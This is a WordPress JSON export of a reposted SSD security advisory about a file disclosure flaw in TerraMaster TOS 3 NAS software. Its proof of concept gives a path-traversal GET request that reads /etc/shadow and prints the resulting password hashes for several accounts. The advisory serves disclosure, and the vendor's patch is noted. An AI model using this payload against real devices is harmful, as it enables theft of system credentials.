{"id":7552,"date":"2017-05-07T14:19:53","date_gmt":"2017-05-07T22:19:53","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/05\/07\/news-1337\/"},"modified":"2017-05-07T14:19:53","modified_gmt":"2017-05-07T22:19:53","slug":"news-1337","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/05\/07\/news-1337\/","title":{"rendered":"SSD Advisory \u2013 TerraMaster Operating System (TOS) File Disclosure"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Sun, 07 May 2017 00:33:00 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3080\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><\/p>\n<p><script>var obj = jQuery('#a-href-3080');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script>  \t\t<\/p>\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes a File Disclosure vulnerability found in TerraMaster Operating System (TOS) version 3.<\/p>\n<p>TerraMaster Operating System, TOS is a Linux platform-based operating system developed for TerraMaster cloud storage NAS server. TOS 3 is the third generation operating system newly launched.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> TerraMaster has released patches to address this vulnerability &#8211; &#8220;Tech team limit the normal user\u2019s rights&#8221;.<\/p>\n<p><span id=\"more-3080\"><\/span><\/p>\n<p><strong>Vulnerability Details<\/strong><br \/> The TerraMaster Operating System is vulnerable to a file disclosure vulnerability.<\/p>\n<p>The vulnerability can be found in &#8220;index.php&#8221; file. When calling it with the parameters &#8220;<em>explorer\/fileProxy&amp;path=<\/em>&#8221; any authenticated user can download any file found in the system.<\/p>\n<p><strong>Proof of Concept<\/strong><br \/> An attacker that is logged in to the remote NAS, can by sending the following request download the <em>\/etc\/shadow<\/em> file:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-590f9d885d084244348799\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> GET  IPOfTheServer:Port\/3.0\/\/index.php?explorer\/fileProxy&amp;path=&#8230;%2f&#8230;.%2f%2f%2f&#8230;%2f&#8230;.%2f%2f%2f&#8230;%2f&#8230;.%2f%2f%2f&#8230;%2f&#8230;.%2f%2f%2f&#8230;%2f&#8230;.%2f%2f%2f&#8230;%2f&#8230;.%2f%2f%2fetc%2fshadow HTTP\/1.1  Host: 127.0.0.1:8181<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0007 seconds] -->  <\/p>\n<p>As can be seen below, in response, the TerraMaster Operating System will send the \/etc\/shadow file to the attacker:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-590f9d885d096362501751\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> root:$1$SgVbyjor$C7Ts4QXkjSjmHA5nSNH7x91:17220:0:99999:7:::  mysql:!:15139:0:99999:7:::  sshd:!:15139:0:99999:7:::  daemon:!:15206:0:99999:7:::  admin:$1$0\/E6lWfi$qW5uGkMDFddDs3Pbt.UQyO\/:17220:0:99999:7:::  rsync:$1$eCUOYuA7$T0mPjcyv6gq8CvwrNsKBX1:15278:0:99999:7:::  TimeMachine:$1$YEyZ4a58$RN4xjc0\/3to9s3b0Fn4nU1:15310:0:99999:7:::  guest:$1$sEXZ4zTY$bxAsHrNEqAGtziZ5hlwLo.:15293:0:99999:7:::<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-590f9d885d096362501751-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590f9d885d096362501751-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590f9d885d096362501751-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590f9d885d096362501751-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590f9d885d096362501751-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590f9d885d096362501751-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590f9d885d096362501751-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590f9d885d096362501751-8\">8<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-590f9d885d096362501751-1\"><span class=\"crayon-v\">root<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">SgVbyjor<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">C7Ts4QXkjSjmHA5nSNH7x91<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">17220<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">99999<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">7<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590f9d885d096362501751-2\"><span class=\"crayon-v\">mysql<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">15139<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">99999<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">7<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590f9d885d096362501751-3\"><span class=\"crayon-v\">sshd<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">15139<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">99999<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">7<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590f9d885d096362501751-4\"><span class=\"crayon-v\">daemon<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">15206<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">99999<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">7<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590f9d885d096362501751-5\"><span class=\"crayon-v\">admin<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">E6lWfi<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">qW5uGkMDFddDs3Pbt<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">UQyO<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">17220<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">99999<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">7<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590f9d885d096362501751-6\"><span class=\"crayon-v\">rsync<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">eCUOYuA7<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">T0mPjcyv6gq8CvwrNsKBX1<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">15278<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">99999<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">7<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590f9d885d096362501751-7\"><span class=\"crayon-v\">TimeMachine<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">YEyZ4a58<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">RN4xjc0<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">3to9s3b0Fn4nU1<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">15310<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">99999<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">7<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590f9d885d096362501751-8\"><span class=\"crayon-v\">guest<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">sEXZ4zTY<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">bxAsHrNEqAGtziZ5hlwLo<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">15293<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">99999<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">7<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0018 seconds] -->  <\/p>\n<\/p><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3080\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Sun, 07 May 2017 00:33:00 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describes a File Disclosure vulnerability found in TerraMaster Operating System (TOS) version 3. TerraMaster Operating System, TOS is a Linux platform-based operating system developed for TerraMaster cloud storage NAS server. TOS 3 is the third generation operating system newly launched. Credit An independent security researcher has reported this vulnerability to &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3080\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 TerraMaster Operating System (TOS) File Disclosure<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11591,10757],"class_list":["post-7552","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-file-disclosure","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7552","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=7552"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7552\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=7552"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=7552"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=7552"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}